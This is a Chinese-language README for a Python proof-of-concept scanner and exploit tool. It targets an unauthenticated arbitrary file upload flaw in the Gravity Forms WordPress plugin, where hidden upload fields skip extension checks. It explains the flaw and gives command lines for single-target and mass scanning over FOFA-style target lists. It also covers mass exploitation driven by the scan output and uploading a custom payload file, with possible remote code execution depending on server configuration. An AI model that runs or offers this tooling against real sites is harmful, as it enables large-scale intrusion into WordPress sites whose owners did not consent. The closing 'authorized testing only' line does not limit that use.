针对 Gravity Forms 中 CVE-2026-84434 的 Python 3 PoC 扫描器与漏洞利用工具。
| 插件 | gravityforms |
| 受影响版本 | ≤ 3.1.0.4 |
| 修复版本 | 3.1.0.5+(厂商安全版本 3.1.1) |
| CVSS | 9.8(严重) |
| 认证 | 未认证 |
| CWE | CWE-434 — 无限制上传 |
| 致谢 | 0xd4rk5id3 — EnvoraSec (Wordfence) |
隐藏的 File Upload 字段在验证流程中跳过了扩展名验证,而持久化路径可能仍会在没有等效检查的情况下调用 upload_file()。未认证攻击者可以向包含 Visibility → Hidden 的 File Upload 字段的公开表单发送 POST 请求。
文件存储在 wp-content/uploads/gravity_forms/ 下。Gravity Forms 通常会添加 .htaccess 规则以阻止 PHP 执行;RCE 取决于服务器配置(nginx、备用 docroot 等)。
gform_wrapper 和隐藏的 fileupload 字段(input_{form}_{field})gform_submit、is_submit_{id}、文件放在隐藏输入上)pip install -r requirements.txtpip install -r requirements.txt
# Check single target
python poc.py -u https://target.example --mode check
# Mass check
python poc.py --list targets.example.txt --mode check --threads 30 --quiet
# Exploit (built-in benign .txt probe unless --payload-file is set)
python poc.py -u https://target.example --mode exploit \
--form-id 3 --page-url /contact/ --file-field 7
# Custom upload file (your own probe — not included in this repo)
python poc.py -u https://target.example --mode exploit \
--form-id 3 --page-url /contact/ --file-field 7 \
--payload-file probe.txt
# Mass exploit from check output
python poc.py --list candidates.jsonl --mode exploit --threads 10 --quiet
| 选项 | 描述 |
|---|---|
-u, --url | 单个目标基础 URL |
--list | URL 列表、FOFA 风格 CSV 或 candidates.jsonl |
--mode | check(默认)或 exploit |
--form-id | Gravity Form ID |
--page-url | 承载表单的页面路径或 URL |
--file-field | 隐藏文件上传字段 ID |
--payload-file | 要上传的本地文件(默认:内存中的无害 .txt 标记) |
--paths | 用于爬取表单的额外路径 |
--threads, -j | 批量并发数(默认 20) |
--output | JSONL 结果(默认 cve_2026_84434_results.jsonl) |
--vuln-list | 命中 URL 或利用成功记录(默认 hits.txt) |
--candidates-list | 检查元数据(默认 candidates.jsonl) |
--quiet | 批量运行时减少进度输出 |
| 文件 | 内容 |
|---|---|
cve_2026_84434_results.jsonl | 每个目标的完整 JSON |
hits.txt | 候选基础 URL |
candidates.jsonl | form_id、page_url、file_field / input_name |
status 值(检查)| 状态 | 含义 |
|---|---|
candidate | 存在漏洞版本 + 公开表单上的隐藏文件上传 |
forms_no_hidden_upload | 找到表单,但 HTML 中没有隐藏文件上传 |
plugin_no_public_forms | 存在插件,但未发现公开表单 |
patched | 版本 > 3.1.0.4 |
no_plugin | 未检测到 Gravity Forms |
.
├── poc.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore
本地扫描列表和产物(list.txt、*.jsonl、自定义 payload)位于 .gitignore 中,不应提交。
仅用于授权的安全测试。您有责任遵守适用的法律和项目规则。